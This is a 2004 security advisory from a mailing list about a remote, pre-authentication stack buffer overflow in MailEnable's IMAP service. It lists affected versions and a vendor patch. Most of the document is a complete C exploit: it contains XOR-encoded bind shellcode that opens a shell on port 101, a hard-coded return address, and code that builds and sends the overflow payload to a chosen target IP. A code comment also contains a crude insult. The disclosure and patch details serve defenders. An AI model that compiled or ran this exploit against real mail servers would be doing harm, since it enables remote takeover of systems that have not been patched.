Date: 29 Nov 2004 10:53:36 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Subject: [NT] MailEnable IMAP Service Remote Buffer Overflow
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
MailEnable IMAP Service Remote Buffer Overflow
------------------------------------------------------------------------
SUMMARY
"MailEnable's Mail Server software provides a
powerful, scalable hosted messaging platform for Microsoft Windows. The
software is reliable, affordable and has all of the features of a
professional high performance mail server without the complexity or cost."
<http://www.mailenable.com>
Two vulnerabilities were discovered in MailEnable's IMAP service: a
stack based buffer overflow and an object pointer overwrite. Both can
lead to remote execution of arbitrary code.
DETAILS
Vulnerable Systems:
* MailEnable Professional Edition version 1.52
* MailEnable Enterprise Edition version 1.01
Immune Systems:
* MailEnable (All) with patch supplied by vendor
A stack based overflow was found in MailEnable's IMAP service which allows
remote execution of arbitrary code on the server machine. The overflow is
caused by inadequate bounds checking on the input buffer. Sending a
request of more than 8198 bytes will overwrite the stack buffer.
It should be noted that this vulnerability can be triggered before any
kind of authentication is performed, making it extremely easy to exploit
remotely. Proof of concept exploit code is provided below.
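The bounds check whose absence is described above, as an added C example (not MailEnable's code and not part of the original advisory): a line reader that tests the limit before every store and discards an over-long line up to its LF, so the session can reject it before authentication. LINE_LIMIT, line_feed and classify_line are names and values assumed for this example.

```c
#include <stddef.h>
#include <string.h>
/* Longest accepted line, counting CR but not LF. Assumed value, not MailEnable's. */
#define LINE_LIMIT 8192
enum line_status { LINE_INCOMPLETE, LINE_READY, LINE_TOO_LONG };
struct line_buf {
    char   data[LINE_LIMIT + 1];  /* +1 for the terminating NUL */
    size_t used;                  /* bytes stored for the line in progress */
    int    overflowed;            /* line in progress already hit the limit */
};

/* Feed received bytes; stops after the first LF. *taken = bytes consumed. */
enum line_status line_feed(struct line_buf *lb, const char *in, size_t n, size_t *taken)
{
    for (size_t i = 0; i < n; i++) {
        if (in[i] == '\n') {
            enum line_status st = lb->overflowed ? LINE_TOO_LONG : LINE_READY;
            if (lb->used > 0 && lb->data[lb->used - 1] == '\r')
                lb->used--;                      /* strip the CR of CRLF */
            lb->data[lb->used] = '\0';           /* always inside data[] */
            lb->used = 0; lb->overflowed = 0;    /* ready for the next line */
            *taken = i + 1;
            return st;
        }
        if (lb->used == LINE_LIMIT)
            lb->overflowed = 1;                  /* limit hit: store nothing more */
        if (!lb->overflowed)
            lb->data[lb->used++] = in[i];
    }
    *taken = n;
    return LINE_INCOMPLETE;
}

/* Constructed input: body_len filler bytes plus CRLF, fed in 1460-byte reads. */
enum line_status classify_line(size_t body_len)
{
    static char wire[16384];
    static struct line_buf lb;
    enum line_status st = LINE_INCOMPLETE;
    size_t total = body_len + 2, off = 0, taken = 0;
    if (body_len > sizeof wire - 2) return LINE_TOO_LONG;  /* driver's own bound */
    memset(&lb, 0, sizeof lb);
    memset(wire, 'x', body_len);
    memcpy(wire + body_len, "\r\n", 2);
    for (; off < total && st == LINE_INCOMPLETE; off += taken)
        st = line_feed(&lb, wire + off, total - off < 1460 ? total - off : 1460, &taken);
    return st;
}

int main(void) { return classify_line(8191) == LINE_READY && classify_line(8198) == LINE_TOO_LONG ? 0 : 1; }
```

On LINE_TOO_LONG the caller would answer with an error and close or resynchronise the session; the over-long bytes are never copied anywhere.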
Patch Availability:
The vendor has released a patch to mitigate this vulnerability and the
second, object pointer vulnerability. It can be downloaded from:
<http://mailenable.com/hotfix/MEIMAPS-HF041125.zip>
Disclosure Timeline:
24 November 2004 - Vendor informed
24 November 2004 - Initial response
25 November 2004 - Fix released
Proof Of Concept
/*
MailEnable , IMAP Service, Remote Buffer Overflow Exploit v0.4
Homepage : www.mailenable.com
Affected versions: Pro v1.52
Enterprise v1.01
Bug discovery : Nima Majidi at www.hat-squad.com
Exploit code : class101 at www.hat-squad.com
& dfind.kd-team.com
Fix : http://mailenable.com/hotfix/MEIMAPS-HF041125.zip
Compilation : 101_ncat.cpp ......... Win32 (MSVC,cygwin)
101_ncat.c ........... Linux
*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
//BIND shellcode port 101, XORed 0x88, thanx HDMoore.
char scode[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
static char payload[10000];
char magikcll[]="\x7a\x8c\x01\x10"; //CALL EDI - MEAISP.dll - "Universal"
char gay[]="\x4b\x2d\x4f\x54\x69\x4b"; //long F0CK to them
void usage(char* us);
#ifdef WIN32
WSADATA wsadata;
#endif
void ver();
int main(int argc,char *argv[])
{
ver();
if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>1)){usage(argv[0]);return -1;}
#ifndef WIN32
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
#endif
int ip=htonl(inet_addr(argv[2])), sz, port, sizeA, a;
char *target, *os;
if (argc==4){port=atoi(argv[3]);}
else port=143;
if (atoi(argv[1]) == 1){target=magikcll;os="Win2k SP4 Pro English\n[+] Win2k SP4 Pro French\n[+] Win2k SP4 Server English\n[+] all Win2k, NT4 (supposed)";}
SOCKET s;fd_set mask;struct timeval timeout;struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1) {printf("[+] socket() error\n");return -1;}
printf("[+] target: %s\n",os);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
printf("[+] connected, constructing the payload...\n");
#ifdef WIN32
Sleep(2000);
#else
Sleep(2);
#endif
sizeA=8202-sizeof(scode);
sz=3+8198+4;
memset(payload,0,sizeof(payload));
strcat(payload,"\x41\x41\x41");
strcat(payload,scode);
for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
strcat(payload,target);
strcat(payload,"\r\n");
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error, the server prolly rebooted.");return -1;}
#ifdef WIN32
Sleep(1000);
#else
Sleep(1);
#endif
printf("[+] size of payload: %d\n",sz);
printf("[+] payload send, connect the port 101 to get a shell.\n");
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
void usage(char* us)
{
printf("USAGE: 101_mEna.exe Target Ip Port\n");
printf("TARGETS: \n");
printf(" [+] 1. Win2k SP4 Pro English (*)\n");
printf(" [+] 1. Win2k SP4 Pro French (*)\n");
printf(" [+] 1. Win2k SP4 Server English (*)\n");
printf(" [+] 1. All Win2K, NT4 \n");
printf("NOTE: \n");
printf(" The port 143 is default if no port are specified\n");
printf(" The exploit bind a shellcode to the port 101\n");
printf(" A wildcard (*) mean Tested.\n");
return;
}
void ver()
{
printf(" \n");
printf(" ===================================================[v0.1]====\n");
printf(" ======MailEnable, Pro Mail Server for Windows <= v1.52=======\n");
printf(" ========IMAP Service, Remote Buffer Overflow Exploit=========\n");
printf(" ======coded by class101=============[Hat-Squad.com 2004]=====\n");
printf(" =============================================================\n");
printf(" \n");
}
ADDITIONAL INFORMATION
The information has been provided by class 101 <mailto:class101@gmail.com>.